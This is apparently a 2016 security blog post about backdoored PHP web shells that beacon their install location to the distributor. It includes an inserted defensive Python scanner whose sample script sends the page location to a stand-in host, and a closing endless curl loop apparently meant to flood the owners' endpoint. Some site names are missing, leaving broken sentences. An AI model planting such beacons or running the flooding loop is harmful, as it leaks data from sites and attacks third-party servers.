shady shells

Jun 21, 2016  


I was in need of some web shells for some security research I was conducting. I found which has a nice selection of shells that can be downloaded to accommodate my need to test some malicious PHP code in my application.


As expected, every shell on is backdoored (backdoor the backdoors, eh?).

This code is found at the bottom of EVERY shell supplied by These scripts should inherently not be trusted or run on your web server, as they are often backdoored and do all kinds of other nasty things. They are used by bad actors to view, modify, and often upload more files to compromised PHP web applications. The JavaScript found in each of the supplied web shells sends the location of each web shell to the owners of

This means that when a bad actor uses a malicious web shell that was posted on the location of that shell is sent to the owners of From here the owners of likely automatically upload additional malicious code. This is very common and clearly points out that there is no honor among script kiddies.
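
A defender-side check for the behaviour described above, as an added example that is not from the original post: it scans PHP/HTML source for markup or inline JavaScript that contacts a host outside an allow-list, and marks inline scripts that also read the page's own address. The form of the beacon, the name `find_callbacks` and the `collector.example` sample are assumptions, since the post's actual snippet is not reproduced here.

```python
import re
from urllib.parse import urlsplit

SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
SRC_ATTR = re.compile(r"""<(?:script|img|iframe)\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
URL_LITERAL = re.compile(r"""["']((?:https?:)?//[^"'\s]+)""", re.I)
READS_LOCATION = re.compile(
    r"\b(?:document\.URL|location\.href|document\.location|window\.location)\b")

def _host(url):
    """Hostname of an absolute or protocol-relative URL; None for relative paths."""
    if not re.match(r"(?:https?:)?//", url, re.I):
        return None
    return urlsplit(("http:" + url) if url.startswith("//") else url).hostname

def find_callbacks(source, allowed_hosts=frozenset()):
    """Return sorted (line, host, reason) tuples for content that contacts a foreign host."""
    findings = []

    def report(offset, url, reason):
        host = _host(url)
        if host and host not in allowed_hosts:
            findings.append((source.count("\n", 0, offset) + 1, host, reason))

    # Tags whose src makes the browser fetch from another host when the page renders.
    for m in SRC_ATTR.finditer(source):
        report(m.start(), m.group(1), "remote src")
    # Inline scripts that build a remote URL; worse if they also read the page address.
    for block in SCRIPT_BLOCK.finditer(source):
        body = block.group(1)
        leaks = bool(READS_LOCATION.search(body))
        for u in URL_LITERAL.finditer(body):
            report(block.start(1) + u.start(), u.group(1),
                   "script sends page location" if leaks else "URL in inline script")
    return sorted(findings)

# Constructed sample: a stand-in for the tail of a downloaded file, not the real snippet.
SAMPLE = '''<?php
echo "panel";
?>
<script src="/static/ui.js"></script>
<script>
var i = new Image();
i.src = "//collector.example/log?u=" + encodeURIComponent(document.location);
</script>
'''

if __name__ == "__main__":
    for line, host, reason in find_callbacks(SAMPLE):
        print(f"line {line}: {host} ({reason})")
```

Run it over every file in a web root with your own domains in `allowed_hosts`; any remaining hit is a file that makes visitors' browsers report to a third party.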

I hope that they sanitize their input and check that it’s actually a valid URL 🙂

$ while true; do curl -A butts$RANDOM; done